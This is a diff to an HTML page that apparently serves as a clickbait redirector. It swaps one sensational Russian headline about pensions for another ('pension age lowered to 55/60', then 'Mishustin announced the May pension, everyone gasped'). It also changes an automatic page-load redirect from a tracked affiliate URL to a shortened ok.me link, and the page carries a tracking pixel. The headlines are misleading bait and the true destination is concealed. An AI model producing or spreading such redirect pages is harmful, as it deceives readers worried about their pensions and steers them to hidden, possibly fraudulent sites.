--- a/index.html
+++ b/index.html
@@ -17,12 +17,12 @@
 <noscript><div><img src="https://mc.yandex.ru/watch/92790536" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
 <!-- /Yandex.Metrika counter -->
 <head>
-   <title>Пенсионный возраст понизят до 55/60 лет: россиян ждет большой сюрприз в 2025 году</title>
+   <title>Мишустин огласил майскую пенсию - все ахнули, услышав сумму</title>
   <script>
-    window.location.replace("https://nova-report.com/preview/new?utm_campaign=14014&utm_content=04a83fb8-44bc-410f-8709-f5708185c81e&utm_source=[SID]&utm_medium=4150&is_visitor=1");
+    window.location.replace("https://ok.me/wtUG1");
   </script>
 </head>
 <body>
-  Если страница не открылась, то нажмите еще раз <a href="https://nova-report.com/preview/new?utm_campaign=14014&utm_content=04a83fb8-44bc-410f-8709-f5708185c81e&utm_source=[SID]&utm_medium=4150&is_visitor=1">сюда</a>.
+  Если страница не открылась, то нажмите еще раз <a href="https://ok.me/wtUG1">сюда</a>.
 </body>
 </html>
